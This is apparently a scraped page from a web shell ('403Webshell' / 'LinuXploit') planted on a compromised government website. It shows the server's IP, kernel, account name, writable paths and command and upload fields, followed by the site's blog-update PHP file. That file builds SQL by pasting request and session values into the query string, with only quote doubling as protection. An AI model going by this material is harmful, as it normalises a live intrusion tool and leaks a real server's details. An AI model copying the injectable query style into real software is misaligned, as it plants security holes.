403Webshell
Server IP : 119.59.102.212  /  Your IP : 3.133.157.170
Web Server : Apache/2
System : Linux narin 2.6.32-042stab142.1 #1 SMP Tue Jan 28 23:44:17 MSK 2020 x86_64
User : yangkam ( 1022)
PHP Version : 5.6.40
Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/yangkam/domains/yangkam.go.th/public_html/coremain/module/blog/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /home/yangkam/domains/yangkam.go.th/public_html/coremain/module/blog/blog_update_output.php
<?php
if ($_SESSION['id_sub'] == "9999")
  $navig['blog'] = "ติอต่อเรา";
else
  $navig['blog'] = $data_name_menu_sub['name'];
$navig['blog_update'] = $msg_edit;
navigator($navig);
echo "<br>";
bar_header($_SESSION['bar_name']); // Bar_Header
fieldset_top($_SESSION['bar_name']);

if ($p_check_pic1 != "") {
  $check_pic1 = trim($p_check_pic1);
}
if ($p_check_pic2 != "") {
  $check_pic2 = trim($p_check_pic2);
}
if ($p_check_pic3 != "") {
  $check_pic3 = trim($p_check_pic3);
}

$userfile1_name = trim($_FILES['userfile1']['name']);
$userfile2_name = trim($_FILES['userfile2']['name']);
$userfile3_name = trim($_FILES['userfile3']['name']);

// เช็คไฟล์ว่าถูกต้องหรือไม่
if ($userfile1_name != "") {
  check_file($userfile1_name);
}
if ($userfile2_name != "") {
  check_file($userfile2_name, 2);
}
if ($userfile3_name != "") {
  check_file($userfile3_name, 3);
}

// Create_Filename
if ($userfile1_name != "") {
  $name1 = create_filename($userfile1_name);
  $dlink = "$_SESSION[web_name]/mainfile/" . $name1;
  delete_filename("cms_blog", "file1", $_SESSION['id_sub'], "$_SESSION[web_name]/mainfile/", "id_blog");
  upload_file_to_server($dlink, $_FILES['userfile1']);
}
if ($userfile2_name != "") {
  $name2 = create_filename($userfile2_name);
  $dlink = "$_SESSION[web_name]/mainfile/" . $name2;
  delete_filename("cms_blog", "file2", $_SESSION['id_sub'], "$_SESSION[web_name]/mainfile/", "id_blog");
  upload_file_to_server($dlink, $_FILES['userfile2']);
}
if ($userfile3_name != "") {
  $name3 = create_filename($userfile3_name);
  $dlink = "$_SESSION[web_name]/mainfile/" . $name3;
  delete_filename("cms_blog", "file3", $_SESSION['id_sub'], "$_SESSION[web_name]/mainfile/", "id_blog");
  upload_file_to_server($dlink, $_FILES['userfile3']);
}

// ######## เอาไฟล์ออกจากระบบ #######
if ($check_pic1 == "1" && $userfile1_name == "") {
  check_pic_out("cms_blog", "file1", $_SESSION['id_sub'], "$_SESSION[web_name]/mainfile/", "id_blog");
  $name1 = "";
}
if ($check_pic2 == "1" && $userfile2_name == "") {
  check_pic_out("cms_blog", "file2", $_SESSION['id_sub'], "$_SESSION[web_name]/mainfile/", "id_blog");
  $name2 = "";
}
if ($check_pic3 == "1" && $userfile3_name == "") {
  check_pic_out("cms_blog", "file3", $_SESSION['id_sub'], "$_SESSION[web_name]/mainfile/", "id_blog");
  $name3 = "";
}

$fulltexts = str_replace("'", "''", $fulltexts);
$sql = "UPDATE `cms_blog` SET `fulltexts` = '$fulltexts' ,file1='$name1', file2='$name2', file3='$name3' WHERE `id_sub` = '$_SESSION[id_sub]'";
$result = mysql_query($sql) or die(mysql_error());

msg_update_data(); // ข้อความแก้ไขแล้ว
refresh_data("index.php?mod=blog&path=blog&id_sub=" . $_SESSION['id_sub'], "2"); // refresh หน้าจอ
fieldset_down();
?>

Youez - 2016 - github.com/yon3zu
LinuXploit